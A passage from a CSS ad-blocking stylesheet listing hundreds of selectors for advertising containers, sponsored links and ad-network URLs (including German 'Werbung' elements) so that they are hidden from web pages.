,.adsensebig,.adsenseblock,.adsenseblock_bottom,.adsenseblock_top,.adsenselr,.adsensem_widget,.adsensesq,.adsenvelope,.adserver_zone,.adset,.adsforums,.adsghori,.adsgvert,.adshome,.adside,.adsidebox,.adsider,.adsingle,.adsleft,.adsleftblock,.adslink,.adslogan,.adslotleft,.adslotright,.adsmalltext,.adsmessage,.adsnippet_widget,.adspace,.adspace-MR,.adspace-widget,.adspace180,.adspace_bottom,.adspace_buysell,.adspace_rotate,.adspace_skyscraper,.adspacer,.adspot,.adspot728x90,.adstext,.adstextpad,.adstitle,.adstop,.adstory,.adstrip,.adtab,.adtable,.adtag,.adtech,.adtext,.adtext_gray,.adtext_horizontal,.adtext_onwhite,.adtext_vertical,.adtile,.adtips,.adtips1,.adtitle,.adtop,.adtravel,.adtxt,.adtxtlinks,.adunit,.adv-mpu,.adv-p,.adv-sidebar,.adv300,.advBox,.advSquare,.advVideobox,.adv_120x600,.adv_300x250,.adv_728x90,.adv_banner_hor,.adv_medium_rectangle,.adver,.adverTag,.adverTxt,.adver_cont_below,.advert-300-side,.advert-300x100-side,.advert-728x90,.advert-article-bottom,.advert-bannerad,.advert-bg-250,.advert-bloggrey,.advert-box,.advert-btm,.advert-head,.advert-horizontal,.advert-iab-300-250,.advert-iab-468-60,.advert-mpu,.advert-skyscraper,.advert-text,.advert-title,.advert-txt,.advert120,.advert300,.advert300x250,.advert300x300,.advert300x440,.advert350ih,.advert4,.advert5,.advert728x90,.advert8,.advertColumn,.advertCont,.advertContainer,.advertContent,.advertHeadline,.advertIslandWrapper,.advertRight,.advertSuperBanner,.advertText,.advertTitleSky,.advert_336,.advert_468x60,.advert_box,.advert_cont,.advert_container,.advert_djad,.advert_google_content,.advert_google_title,.advert_home_300,.advert_label,.advert_leaderboard,.advert_list,.advert_note,.advert_surr,.advert_top,.advertheader-red,.advertise,.advertise-here,.advertise-homestrip,.advertise-horz,.advertise-inquiry,.advertise-leaderboard,.advertise-list,.advertise-top,.advertise-vert,.advertiseContainer,.advertiseText,.advertise_ads,.advertise_here,.advertise_link,.advertise_link_sidebar,.advertisement,.advertisement-728x90,.advertisement-block,.advertisement-sidebar,.advertisement-space,.advertisement-sponsor,.advertisement-swimlane,.advertisement-text,.advertisement-top,.advertisement300x250,.advertisement468,.advertisementBox,.advertisementColumnGroup,.advertisementContainer,.advertisementHeader,.advertisementLabel,.advertisementPanel,.advertisementText,.advertisement_300x250,.advertisement_btm,.advertisement_caption,.advertisement_g,.advertisement_header,.advertisement_horizontal,.advertisement_top,.advertisementsOutterDiv,.advertiser,.advertiser-links,.advertisespace_div,.advertising-banner,.advertising-header,.advertising-leaderboard,.advertising-local-links,.advertising2,.advertisingTable,.advertising_block,.advertising_images,.advertisment,.advertisment_bar,.advertisment_caption,.advertisment_two,.advertize,.advertize_here,.advertorial,.advertorial-2,.advertorial-promo-box,.advertorial_red,.advertorialtitle,.adverts,.adverts-125,.adverts_RHS,.advt,.advt-banner-3,.advt-block,.advt-sec,.advt300,.advt720,.advtitle,.adwhitespace,.adwordListings,.adwords,.adwordsHeader,.adwrap,.adwrapper-lrec,.adwrapper948,.adzone-footer,.adzone-sidebar,.affiliate-link,.affiliate-sidebar,.affiliateAdvertText,.affiliates-sidebar,.affinityAdHeader,.afsAdvertising,.after_ad,.agi-adsaleslinks,.alb-content-ad,.alignads,.alt_ad,.anchorAd,.another_text_ad,.answer_ad_content,.aolSponsoredLinks,.aopsadvert,.apiAdMarkerAbove,.apiAds,.app_advertising_skyscraper,.archive-ads,.art_ads,.article-ad-box,.article-ads,.article-content-adwrap,.articleAd,.articleAd300x250,.articleAds,.articleAdsL,.articleEmbeddedAdBox,.article_ad,.article_adbox,.article_mpu_box,.article_page_ads_bottom,.articleads,.aseadn,.aux-ad-widget-1,.aux-ad-widget-2,.b-astro-sponsored-links_horizontal,.b-astro-sponsored-links_vertical,.b_ads_cont,.b_ads_top,.banmanad,.banner-468-60,.banner-468x60,.banner-ad,.banner-ads,.banner-adv,.banner-advert,.banner-adverts,.banner-buysellads,.banner160x600,.banner300by250,.banner300x100,.banner300x250,.banner468,.banner468by60,.banner728x90,.bannerADV,.bannerAd,.bannerAdWrapper300x250,.bannerAdWrapper730x86,.bannerAds,.bannerAdvert,.bannerRightAd,.banner_160x600,.banner_300x250,.banner_728x90,.banner_ad,.banner_ad_footer,.banner_ad_leaderboard,.bannerad,.bannerad-125tower,.bannerad-468x60,.barkerAd,.base-ad-mpu,.base_ad,.base_printer_widgets_AdBreak,.bg-ad-link,.bgnavad,.big-ads,.bigAd,.big_ad,.big_ads,.bigad,.bigad2,.bigbox_ad,.bigboxad,.billboard300x250,.billboard_ad,.biz-ad,.biz-ads,.biz-adtext,.blk_advert,.block-ad,.block-ad300,.block-admanager,.block-ads-bottom,.block-ads-top,.block-adsense,.block-adsense-managed,.block-adspace-full,.block-bg-advertisement-region-1,.block-deca_advertising,.block-google-admanager,.block-google_admanager,.block-openads,.block-openadstream,.block-openx,.block-thirdage-ads,.block-wtg_adtech,.blockAd,.blockAds,.block_ad,.block_ad_floating_bar,.block_ad_sb_text,.block_ad_sb_text2,.block_ad_sponsored_links,.block_ad_sponsored_links-wrapper,.block_ad_sponsored_links_localized,.blockad,.blocked-ads,.blog-ad-leader-inner,.blog-ads-container,.blogAd,.blogAdvertisement,.blogArtAd,.blogBigAd,.blog_ad,.blogads,.blox3featuredAd,.bn_textads,.body_ad,.body_sponsoredresults_bottom,.body_sponsoredresults_middle,.body_sponsoredresults_top,.bodyads,.bodyads2,.bookseller-header-advt,.bottom-ad,.bottom-ad-fr,.bottom-ads,.bottomAd,.bottomAds,.bottom_ad,.bottom_ad_block,.bottom_ads,.bottom_adsense,.bottom_right_ad,.bottomad,.bottomads,.bottomadvert,.bottombarad,.bottomrightrailAd,.bottomvidad,.box-ad,.box-ad-grey,.box-ads,.box-ads-small,.box-adsense,.box-adverts,.boxAd,.boxAds,.boxAdsInclude,.box_ad,.box_ad_container,.box_ad_content,.box_ad_spacer,.box_ad_wrap,.box_ads,.box_adv,.box_adv_new,.box_advertising,.box_advertisment_62_border,.box_content_ad,.box_content_ads,.box_textads,.boxad,.boxads,.boxyads,.bps-ad-wrapper,.bps-advertisement,.bps-advertisement-inline-ads,.br-ad,.breakad_container,.brokerad,.bsa_ads,.btm_ad,.btm_ad_container,.btn-ad,.bullet-sponsored-links,.bullet-sponsored-links-gray,.burstContentAdIndex,.busrep_poll_and_ad_container,.buttonAd,.buttonAds,.button_ads,.button_advert,.buttonadbox,.buttonads,.bx_ad,.bx_ad_right,.cA-adStrap,.cColumn-TextAdsBox,.cLeftTextAdUnit,.c_ligatus_nxn,.calendarAd,.calloutAd,.carbonad,.carbonad-tag,.care2_adspace,.catalog_ads,.category-ad,.categorySponsorAd,.category__big_game_container_body_games_advertising,.cb-ad-banner,.cb-ad-container,.cb_ads,.cb_navigation_ad,.cbstv_ad_label,.cbzadvert,.cbzadvert_block,.cdAdTitle,.cdmainlineSearchAdParent,.cdo-ad-section,.cdsidebarSearchAdParent,.centerAd,.center_ad,.centerad,.centered-ad,.chitikaAdCopy,.cinemabotad,.classifiedAdThree,.clearerad,.cmAdContainer,.cmAdFind,.cmAdSponsoredLinksBox,.cm_ads,.cms-Advert,.cnbc_badge_banner_ad_area,.cnbc_banner_ad_area,.cnbc_leaderboard_ad,.cnn160AdFooter,.cnnAd,.cnnMosaic160Container,.cnnStoreAd,.cnnStoryElementBoxAd,.cnnWCAdBox,.cnnWireAdLtgBox,.cnn_728adbin,.cnn_adcntr300x100,.cnn_adcntr728x90,.cnn_adspc336cntr,.cnn_adtitle,.cntrad,.column2-ad,.columnBoxAd,.columnRightAdvert,.com-ad-server,.comment-ad,.comment-ad-wrap,.comment-advertisement,.comment_ad_box,.common_advertisement_title,.communityAd,.conTSponsored,.conductor_ad,.confirm_ad_left,.confirm_ad_right,.confirm_leader_ad,.consoleAd,.container-adwords,.containerSqAd,.container_serendipity_plugin_google_adsense,.content-ad,.content-ads,.content-advert,.contentAd,.contentAdContainer,.contentAdFoot,.contentAdsWrapper,.content_ad,.content_ad_728,.content_adsense,.content_adsq,.content_tagsAdTech,.contentad,.contentad-home,.contentad300x250,.contentad_right_col,.contentadcontainer,.contentadfloatl,.contentadleft,.contentads,.contentadstartpage,.contents-ads-bottom-left,.contenttextad,.contest_ad,.cp_ad,.cpmstarHeadline,.cpmstarText,.create_ad,.cs-mpu,.cscTextAd,.cse_ads,.cspAd,.ct_ad,.ctnAdSkyscraper,.ctnAdSquare300,.cube-ad,.cubeAd,.cube_ads,.currency_ad,.custom_ads,.cwAdvert,.cxAdvertisement,.darla_ad,.dart-ad,.dartAdImage,.dart_ad,.dart_tag,.dartadvert,.dartiframe,.dc-ad,.dcAdvertHeader,.deckAd,.deckads,.detail-ads,.detailMpu,.detail_ad,.detail_top_advert,.dfrads,.displayAdSlot,.divAd,.divAdright,.div_adv300,.div_advstrip,.divad1,.divad2,.divad3,.divads,.divider_ad,.dlSponsoredLinks,.dmco_advert_iabrighttitle,.downloadAds,.download_ad,.downloadad,.dsq_ad,.dualAds,.dynamic-ads,.dynamic_ad,.e-ad,.ec-ads,.ec-ads-remove-if-empty,.em-ad,.em_ads_box_dynamic_remove,.embed-ad,.embeddedAd,.entry-body-ad,.entry-injected-ad,.entry_sidebar_ads,.entryad,.ez-clientAd,.f_Ads,.feature_ad,.featuredAds,.featured_ad,.featuredadvertising,.fireplaceadleft,.fireplaceadright,.fireplaceadtop,.firstpost_advert_container,.flagads,.flash-advertisement,.flash_ad,.flash_advert,.flashad,.flexiad,.flipbook_v2_sponsor_ad,.floatad,.floated_right_ad,.floatingAds,.fm-badge-ad,.fns_td_wrap,.fold-ads,.footad,.footer-ad,.footer-advert,.footerAd,.footerAdModule,.footerAds,.footerAdslot,.footerAdverts,.footerTextAd,.footer_ad,.footer_ad336,.footer_ads,.footer_block_ad,.footer_bottomad,.footer_line_ad,.footer_text_ad,.footerad,.forumtopad,.freedownload_ads,.frn_adbox,.frn_cont_adbox,.frontads,.frontpage-google-ad,.ft-ad,.ftdAdBar,.ftdContentAd,.full_ad_box,.full_width_ad,.fullbannerad,.g3rtn-ad-site,.gAdRows,.gAdSky,.gAdvertising,.g_ggl_ad,.ga-ads,.ga-textads-bottom,.ga-textads-top,.gaTeaserAds,.gaTeaserAdsBox,.gads_cb,.gads_container,.gallery_ad,.gam_ad_slot,.gameAd,.gamesPage_ad_content,.gbl_advertisement,.gen_side_ad,.gglAds,.global_banner_ad,.googad,.googads,.google-ad,.google-ad-container,.google-ads,.google-ads-boxout,.google-ads-slim,.google-adsense,.google-right-ad,.google-sponsored-ads,.google-sponsored-link,.google468,.google468_60,.googleAd,.googleAd-content,.googleAd-list,.googleAd300x250_wrapper,.googleAdBox,.googleAdSense,.googleAdSenseModule,.googleAd_body,.googleAds,.googleAds_article_page_above_comments,.googleAdsense,.googleContentAds,.googleProfileAd,.googleSearchAd_content,.googleSearchAd_sidebar,.google_ad,.google_ad_wide,.google_add_container,.google_ads,.google_ads_bom_title,.google_ads_content,.google_adsense_footer,.googlead,.googleaddiv,.googleaddiv2,.googleads,.googleads_300x250,.googleads_title,.googleadsense,.googleafc,.googley_ads,.gpAdBox,.gpAds,.gradientAd,.grey-ad-line,.group_ad,.gsAd,.gsfAd,.gt_ad,.gt_ad_300x250,.gt_ad_728x90,.gt_adlabel,.gutter-ad-left,.gutter-ad-right,.gx_ad,.h-ad-728x90-bottom,.h_Ads,.h_ad,.half-ad,.half_ad_box,.hcf-ad,.hcf-ad-rectangle,.hcf-cms-ad,.hd_advert,.hdr-ads,.head_ad,.header-ad,.header-advert,.header-google-ads,.header-taxonomy-image-sponsor,.headerAd,.headerAdCode,.headerAds,.headerAdvert,.headerTextAd,.header_ad,.header_ad_center { display:none !important; } .header_ad_div,.header_ads,.header_advertisement,.header_advertisment,.headerad,.headerad-720,.hi5-ad,.highlightsAd,.hm_advertisment,.hn-ads,.home-ad-links,.homeAd,.homeAd1,.homeAd2,.homeAdBoxA,.homeAdBoxBetweenBlocks,.homeAdBoxInBignews,.homeAdSection,.homeMediumAdGroup,.home_ad_bottom,.home_advertisement,.home_advertorial,.home_mrec_ad,.homead,.homepage-ad,.homepage300ad,.homepageFlexAdOuter,.homepageMPU,.homepage_middle_right_ad,.homepageinline_adverts,.hor_ad,.horiz_adspace,.horizontalAd,.horizontal_ad,.horizontal_ads,.horizontaltextadbox,.horizsponsoredlinks,.hortad,.houseAd1,.houseAdsStyle,.housead,.hoverad,.hp-col4-ads,.hp2-adtag,.hp_ad_cont,.hp_ad_text,.hp_t_ad,.hp_w_ad,.hpa-ad1,.html-advertisement,.ic-ads,.ico-adv,.idMultiAd,.iframe-ad,.image-advertisement,.imageAd,.imageads,.imgad,.in-page-ad,.in-story-ads,.in-story-text-ad,.inStoryAd-news2,.indEntrySquareAd,.indie-sidead,.indy_googleads,.infoBoxThreadPageRankAds,.inhousead,.inline-ad,.inline-mpu,.inline-mpu-left,.inlineSideAd,.inline_ad,.inline_ad_title,.inlinead,.inlineadsense,.inlineadtitle,.inlist-ad,.inlistAd,.inner-advt-banner-3,.innerAds,.innerad,.inpostad,.insert_advertisement,.insertad,.insideStoryAd,.inteliusAd_image,.interest-based-ad,.internalAdsContainer,.iprom-ad,.is24-adplace,.isAd,.islandAd,.islandAdvert,.islandad,.itemAdvertise,.jimdoAdDisclaimer,.jp-advertisment-promotional,.js-advert,.kdads-empty,.kdads-link,.kw_advert,.kw_advert_pair,.l_ad_sub,.label-ad,.labelads,.largeRecAdNewsContainerRight,.largeRectangleAd,.largeUnitAd,.large_ad,.lastRowAd,.lazyload_ad,.lcontentbox_ad,.leadAd,.leaderAdSlot,.leaderAdTop,.leaderAdvert,.leaderBoardAdHolder,.leaderOverallAdArea,.leader_ad,.leaderboardAd,.leaderboardAdContainer,.leaderboardAdContainerInner,.leaderboard_ad,.leaderboardad,.leaderboardadtop,.left-ad,.left-advert,.leftAd,.leftAdColumn,.leftAds,.left_ad,.left_ad_box,.left_adlink,.left_ads,.left_adsense,.leftad,.leftadtag,.leftbar_ad_160_600,.leftbarads,.leftbottomads,.leftnavad,.lgRecAd,.lg_ad,.ligatus,.linead,.link_adslider,.link_advertise,.live-search-list-ad-container,.livingsocial-ad,.ljad,.local-ads,.log_ads,.logoAds,.logoad,.logoutAd,.longAd,.longAdBox,.lowerAds,.lr-ad,.m-ad-tvguide-box,.m4-adsbygoogle,.m_banner_ads,.macAd,.macad,.main-ad,.main-advert,.main-tabs-ad-block,.mainAd,.mainLeftAd,.mainLinkAd,.mainRightAd,.main_ad,.main_ad_bg_div,.main_adbox,.main_ads,.main_intro_ad,.map_media_banner_ad,.marginadsthin,.marketing-ad,.masthead_topad,.matador_sidebar_ad_600,.mdl-ad,.media-advert,.mediaAd,.mediaAdContainer,.mediaResult_sponsoredSearch,.medium-rectangle-ad,.mediumRectangleAdvert,.medium_ad,.medrect_ad,.member-ads,.menuItemBannerAd,.menueadimg,.messageBoardAd,.mf-ad300-container,.micro_ad,.mid_ad,.mid_page_ad,.midad,.middle-ad,.middleAds,.middlead,.middleads,.min_navi_ad,.mini-ad,.miniad,.miscAd,.mmc-ad,.mmcAd_Iframe,.mod-ad-lrec,.mod-ad-n,.mod-adopenx,.mod-vertical-ad,.mod_admodule,.module-ad,.module-ad-small,.module-ads,.module-advertisement,.module-sponsored-ads,.moduleAd,.moduleAdvertContent,.module_ad,.module_box_ad,.modulegad,.moduletable-advert,.moduletable-googleads,.moduletablesquaread,.mos-ad,.mpu-ad,.mpu-ad-con,.mpu-advert,.mpu-footer,.mpu-fp,.mpu-title,.mpu-top-left,.mpu-top-left-banner,.mpu-top-right,.mpu01,.mpuAd,.mpuAdSlot,.mpuAdvert,.mpuArea,.mpuBox,.mpuContainer,.mpuHolder,.mpuTextAd,.mpu_ad,.mpu_advert,.mpu_container,.mpu_gold,.mpu_holder,.mpu_platinum,.mpu_side,.mpu_text_ad,.mpuad,.mpuholderportalpage,.mrec_advert,.ms-ads-link,.msfg-shopping-mpu,.mvw_onPageAd1,.mwaads,.my-ad250x300,.nSponsoredLcContent,.nSponsoredLcTopic,.nadvt300,.narrow_ad_unit,.narrow_ads,.navAdsBanner,.navBads,.nav_ad,.navadbox,.navcommercial,.navi_ad300,.naviad,.nba300Ad,.nbaT3Ad160,.nbaTVPodAd,.nbaTwo130Ads,.nbc_ad_carousel_wrp,.newPex_forumads,.newTopAdContainer,.newad,.newsAd,.news_article_ad_google,.newsviewAdBoxInNews,.newsvinemsn_adtype,.nexusad,.nf-adbox,.nn-mpu,.noAdForLead,.normalAds,.nrAds,.nsAdRow,.nu2ad,.oas-ad,.oas-bottom-ads,.oas_ad,.oas_advertisement,.offer_sponsoredlinks,.oio-banner-zone,.oio-link-sidebar,.oio-zone-position,.on_single_ad_box,.onethirdadholder,.openads,.openadstext_after,.openx,.openx-ad,.openx_ad,.osan-ads,.other_adv2,.outermainadtd1,.ovAdPromo,.ovAdSky,.ovAdartikel,.ov_spns,.ovadsenselabel,.pageAds,.pageBottomGoogleAd,.pageGoogleAd,.pageGoogleAdFlat,.pageGoogleAdSubcontent,.pageGoogleAds,.pageGoogleAdsContainer,.pageLeaderAd,.page_content_right_ad,.pagead,.pageads,.pagenavindexcontentad,.paneladvert,.partner-ad,.partner-ads-container,.partnerAd,.partnersTextLinks,.pencil_ad,.player_ad_box,.player_hover_ad,.player_page_ad_box,.plista_inimg_box,.pm-ad,.pmad-in2,.pnp_ad,.pod-ad-300,.podRelatedAdLinksWidget,.podSponsoredLink,.portalCenterContentAdBottom,.portalCenterContentAdMiddle,.portalCenterContentAdTop,.portal_searchresultssponsoredlist,.portalcontentad,.post-ad,.postAd,.post_ad,.post_ads,.post_sponsor_unit,.postbit_adbit_register,.postbit_adcode,.postgroup-ads,.postgroup-ads-middle,.prebodyads,.premium_ad_container,.promoAd,.promoAds,.promo_ad,.promoboxAd,.promotionTextAd,.ps-ligatus_placeholder,.pub_300x250,.pub_300x250m,.pub_728x90,.publication-ad,.publicidad,.puff-advertorials,.qa_ad_left,.qm-ad-content,.qm-ad-content-news,.quigo-ad,.qzvAdDiv,.r_ad_1,.r_ad_box,.r_ads,.rad_container,.rect_ad_module,.rectad,.rectangle-ad,.rectangleAd,.rectanglead,.redads_cont,.referrerDetailAd,.regular_728_ad,.regularad,.relatedAds,.related_post_google_ad,.relatesearchad,.remads,.resourceImagetAd,.result_ad,.reviewMidAdvertAlign,.rght300x250,.rhads,.rhs-ad,.rhs-ads-panel,.rhs-advert-container,.rhs-advert-link,.rhs-advert-title,.right-ad,.right-ad-holder,.right-ad2,.right-ads,.right-ads2,.right-sidebar-box-ad,.rightAd,.rightAdBox,.rightAdverts,.rightColAd,.rightColumnRectAd,.rightRailAd,.right_ad,.right_ad_160,.right_ad_box,.right_ad_common_block,.right_ad_text,.right_ad_top,.right_ads,.right_ads_column,.right_box_ad_rotating_container,.right_col_ad,.right_hand_advert_column,.right_side-partyad,.rightad,.rightad_1,.rightad_2,.rightadbox1,.rightads,.rightadunit,.rightbigcolumn_ads,.rightbigcolumn_ads_nobackground,.rightcol_boxad,.rightcoladvert,.rightcoltowerad,.rightmenu_ad,.rnav_ad,.rngtAd,.rot_ads,.round_box_advert,.roundedCornersAd,.roundingrayboxads,.rt_ad1_300x90,.rt_ad_300x250,.rt_ad_call,.s2k_ad,.savvyad_unit,.sb-ad-sq-bg,.sbAd,.sbAdUnitContainer,.sb_ad_holder,.sb_adsN,.sb_adsNv2,.sb_adsW,.sb_adsWv2,.scanAd,.scc_advert,.sci-ad-main,.sci-ad-sub,.search-ad,.search-results-ad,.search-sponsor,.search-sponsored,.searchAd,.searchAdTop,.searchAds,.searchSponsoredResultsBox,.searchSponsoredResultsList,.search_column_results_sponsored,.search_results_sponsored_top,.section-ad2,.section_mpu_wrapper,.section_mpu_wrapper_wrapper,.selfServeAds,.sepContentAd,.serp_sponsored,.servsponserLinks,.shoppingGoogleAdSense,.showAd_No,.showAd_Yes,.showcaseAd,.sidbaread,.side-ad,.side-ads,.side-sky-banner-160,.sideAd,.sideBoxAd,.side_ad,.side_ad2,.side_ad_1,.side_ad_2,.side_ad_3,.sidead,.sideads,.sideadsbox,.sideadvert,.sidebar-ad,.sidebar-ads,.sidebar-content-ad,.sidebar-text-ad,.sidebarAd,.sidebarAdUnit,.sidebarAdvert,.sidebar_ad,.sidebar_ad_300_250,.sidebar_ads,.sidebar_ads_336,.sidebar_adsense,.sidebar_box_ad,.sidebarad,.sidebarad_bottom,.sidebaradbox,.sidebarads,.sidebarboxad,.sideheadnarrowad,.sideheadsponsorsad,.simple_ads_manager_widget,.single-google-ad,.singleAd,.singleAdsContainer,.single_ad,.singlead,.singleadstopcstm2,.site_ad_120_600,.site_ad_300x250,.sitesponsor,.skinAd,.skin_ad_638,.sky-ad,.skyAd,.skyAdd,.skyAdvert,.skyAdvert2,.sky_ad,.sky_scraper_ad,.skyad,.skyjobsadtext,.skyscraper-ad,.skyscraper_ad,.skyscraper_bannerAdHome,.sleekadbubble,.slideshow-ad,.slpBigSlimAdUnit,.slpSquareAdUnit,.sm_ad,.smallSkyAd1,.smallSkyAd2,.small_ad,.small_ads,.smallad-left,.smallads,.smallsponsorad,.smart_ads_bom_title,.spLinks,.specialAd175x90,.speedyads,.sphereAdContainer,.spl-ads,.spl_ad,.spl_ad2,.spl_ad_plus,.splitAd,.splitAdResultsPane,.sponlinkbox,.spons-link,.spons_links,.sponslink,.sponsor-ad,.sponsor-link,.sponsor-links,.sponsor-services,.sponsorPanel,.sponsorPost,.sponsorPostWrap,.sponsorStrip,.sponsor_ad_area,.sponsor_area,.sponsor_bar,.sponsor_columns,.sponsor_footer,.sponsor_line,.sponsor_links,.sponsor_logo,.sponsoradtitle,.sponsored-ads,.sponsored-chunk,.sponsored-editorial,.sponsored-features,.sponsored-links,.sponsored-links-alt-b,.sponsored-links-holder,.sponsored-links-right,.sponsored-post,.sponsored-post_ad,.sponsored-results,.sponsored-right-border,.sponsored-text,.sponsoredBox,.sponsoredInfo,.sponsoredInner,.sponsoredLabel,.sponsoredLink,.sponsoredLinks,.sponsoredLinks2,.sponsoredLinksHeader,.sponsoredProduct,.sponsoredResults,.sponsoredSideInner,.sponsored_ads,.sponsored_box,.sponsored_box_search,.sponsored_by,.sponsored_link,.sponsored_links,.sponsored_links_title_container,.sponsored_links_title_container_top,.sponsored_links_top,.sponsored_result,.sponsored_results,.sponsored_ss,.sponsored_well,.sponsoredibbox,.sponsoredlink,.sponsoredlinks,.sponsoredlinkscontainer,.sponsoredresults,.sponsoredtextlink_container_ovt,.sponsoring_link,.sponsorlink,.sponsorlink2,.sponsormsg,.sport-mpu-box,.spotlightAd,.squareAd,.square_ad,.square_banner_ad,.squared_ad,.ss-ad-banner,.ss-ad-mpu,.standard-ad,.start__newest__big_game_container_body_games_advertising,.staticAd,.stickyAdLink,.stock-ticker-ad-tag,.stocks-ad-tag,.store-ads,.story_AD,.story_ad_div,.story_right_adv,.storyad,.subad,.subadimg,.subcontent-ad,.subtitle-ad-container,.sugarad,.super-ad,.supercommentad_left,.supercommentad_right,.supp-ads,.supportAdItem,.surveyad,.t10ad,.tab_ad,.tab_ad_area,.tablebordersponsor,.tadsanzeige,.tadsbanner,.tadselement,.tallad,.tblTopAds,.tbl_ad,.tbox_ad,.td-Adholder,.td-TrafficWeatherWidgetAdGreyBrd,.teaser-sponsor,.teaserAdContainer,.teaser_adtiles,.teaser_advert_content,.text-ad,.text-ad-links,.text-ads,.text-advertisement,.text-g-advertisement,.text-g-group-short-rec-ad,.text-g-net-grp-google-ads-article-page,.textAd,.textAdBox,.textAds,.text_ad,.text_ads,.textad,.textadContainer,.textad_headline,.textadbox,.textadheadline,.textadlink,.textads,.textads_left,.textads_right,.textadsds,.textadsfoot,.textadtext,.textadtxt,.textadtxt2,.textlink-ads,.textlinkads,.tf_page_ad_search,.thirdage_ads_300x250,.thirdage_ads_728x90,.thisIsAd,.thisIsAnAd,.ticket-ad,.tileAds,.tips_advertisement,.title-ad,.title_adbig,.tncms-region-ads,.toolad,.toolbar-ad,.top-ad,.top-ad-space,.top-ads,.top-banner-ad,.top-left-nav-ad,.top-menu-ads,.topAd,.topAdWrap,.topAds,.topAdvertisement,.topAdverts,.topBannerAd,.topLeaderboardAd,.top_Ad,.top_ad,.top_ad1,.top_ad_728,.top_ad_728_90,.top_ad_disclaimer,.top_ad_div,.top_ad_post,.top_ad_wrapper,.top_ads,.top_advert,.top_advertisement,.top_advertising_lb,.top_bar_ad,.top_container_ad,.topad,.topad-bar,.topadbox,.topads,.topadspot,.topadvertisementsegment,.topboardads,.topcontentadvertisement,.topic_inad,.topstoriesad,.toptenAdBoxA,.tourFeatureAd,.tower-ad,.towerAd,.towerAdLeft,.towerAds,.tower_ad,.tower_ad_disclaimer,.towerad,.tr-ad-adtech-placement,.tribal-ad,.ts-ad_unit_bigbox,.ts-banner_ad,.ttlAdsensel,.tto-sponsored-element,.tucadtext,.tvs-mpu,.twoColumnAd,.twoadcoll,.twoadcolr,.tx_smartadserver_pi1,.txt-ads,.txtAd,.txtAds,.txt_ads,.txtadvertise,.type_adscontainer,.type_miniad,.type_promoads,.ukAds,.ukn-banner-ads,.under_ads,.undertimyads,.unit-ad,.universalboxADVBOX01,.universalboxADVBOX03,.universalboxADVBOX04a,.usenext,.v5rc_336x280ad,.vert-ads,.vert-adsBlock,.vertad,.vertical-adsense,.vidadtext,.videoAd,.videoBoxAd,.video_ad,.view-promo-mpu-right,.view_rig_ad,.virgin-mpu,.wa_adsbottom,.wantads,.weather_ad,.webads336x280,.wide-ad,.wide-advert,.wide-skyscraper-ad,.wideAd,.wideAdTable,.wide_ad,.wide_ad_unit_top,.wide_ads,.wide_google_ads,.widget-ad,.widget-ad-codes,.widget-ad300x250,.widget-entry-ads-160,.widgetYahooAds,.widget_ad,.widget_ad_boxes_widget,.widget_ad_rotator,.widget_adrotate_widgets,.widget_advert_widget,.widget_econaabachoadswidget,.widget_island_ad,.widget_maxbannerads,.widget_sdac_bottom_ad_widget,.widget_sdac_footer_ads_widget,.widget_sdac_skyscraper_ad_widget,.wikia-ad,.wikia_ad_placeholder,.wingadblock,.withAds,.wl-ad,.wnMultiAd,.wp125_write_ads_widget,.wp125ad,.wp125ad_2,.wpn_ad_content,.wrap-ads,.wrapper-ad,.wrapper-ad-sidecol,.wsSponsoredLinksRight,.wsTopSposoredLinks,.x03-adunit,.x04-adunit,.x81_ad_detail,.xads-blk-top-hld,.xads-blk2,.xads-ojedn,.y-ads,.y-ads-wide,.y7-advertisement,.yahoo-sponsored,.yahoo-sponsored-links,.yahooAd,.yahooAds,.yahoo_ads,.yahooad,.yahooad-image,.yahooad-urlline,.yan-sponsored,.ygrp-ad,.yom-ad,.youradhere,.yrail_ad_wrap,.yrail_ads,.ysmsponsor,.ysponsor,.yw-ad,.zRightAdNote,a[href*="/adrotate/adrotate-out.php?"],a[href^="http://ad-apac.doubleclick.net/"],a[href^="http://ad-emea.doubleclick.net/"],a[href^="http://ad.doubleclick.net/"],a[href^="http://ads.pheedo.com/"],a[href^="http://adserving.liveuniversenetwork.com/"],a[href^="http://api.ringtonematcher.com/"],a[href^="http://galleries.pinballpublishernetwork.com/"],a[href^="http://galleries.securewebsiteaccess.com/"],a[href^="http://install.securewebsiteaccess.com/"],a[href^="http://latestdownloads.net/download.php?"],a[href^="http://secure.signup-page.com/"],a[href^="http://secure.signup-way.com/"],a[href^="http://www.FriendlyDuck.com/AF_"],a[href^="http://www.adbrite.com/mb/commerce/purchase_form.php?"],a[href^="http://www.firstload.de/affiliate/"],a[href^="http://www.friendlyduck.com/AF_"],a[href^="http://www.google.com/aclk?"],a[href^="http://www.liutilities.com/aff"],a[href^="http://www.liutilities.com/products/campaigns/adv/"],a[href^="http://www.my-dirty-hobby.com/?sub="],a[href^="http://www.ringtonematcher.com/"],#mbEnd[cellspacing="0"][cellpadding="0"],#mclip_container:last-child,#ssmiwdiv[jsdisplay],#tads.c,#tadsb.c,#tadsto.c,.ch[onclick="ga(this,event)"],.ra[align="left"][width="30%"],.ra[align="right"][width="30%"],div[style="background:#fbf0fa;margin:0 0 14px;min-height:0;padding-top:2px;padding-bottom:1px;padding-right:8px;padding-left:7px"],#WerbungObenRechts10_GesamtDIV,#WerbungObenRechts8_GesamtDIV,#WerbungObenRechts9_GesamtDIV,#WerbungUntenLinks4_GesamtDIV,#WerbungUntenLinks7_GesamtDIV,#WerbungUntenLinks8_GesamtDIV,#WerbungUntenLinks9_GesamtDIV,#Werbung_Content,#Werbung_Sky,#Werbung_Wide,#__ligatus_placeholder__,#ad-bereich1-08,#ad-bereich1-superbanner,#ad-bereich2-08,#ad-bereich2-skyscrapper,#ad-rechts-block,#ad-rechts-sky,#ad_gross,#ad_lang,#ad_oben,#ad_rechts,#adbox_artikel,#adkontainer,#anzeigewerbungtext,#ar_detail_werb103,#bannerwerbung,#callya_freikarte_layer,#cnt_bgwerbung,#cont-werb,#forumformwerbung,#freikarte_layer,#gonamicerror,#header_werbung,#headerwerbung,#kaufDA,#kaufDA-widget-container,#kopf-werbung,#lieferando-widget-container,#moveable_werbung,#p-links-werbung,#p-rechts-werbung,#qm_content_ad_anzeige,#reklame,#startwerbung,#t_werbung,#textwerbung,#topwerbung,#werbLayer1,#werbLayer2,#werbLayer3,#werb_ps103,#werbeadd,#werbebalken_slot,#werbebanner,#werbeblock,#werbebox,#werbebox_contentad,#werbecontainer_content,#werbecontainer_sky,#werbeflaeche,#werbetrenner,#werbung,#werbung-left,#werbung-skyscraper,#werbung1,#werbung2,#werbung3,#werbung792_2,#werbungSuperbanner,#werbung_bigsize,#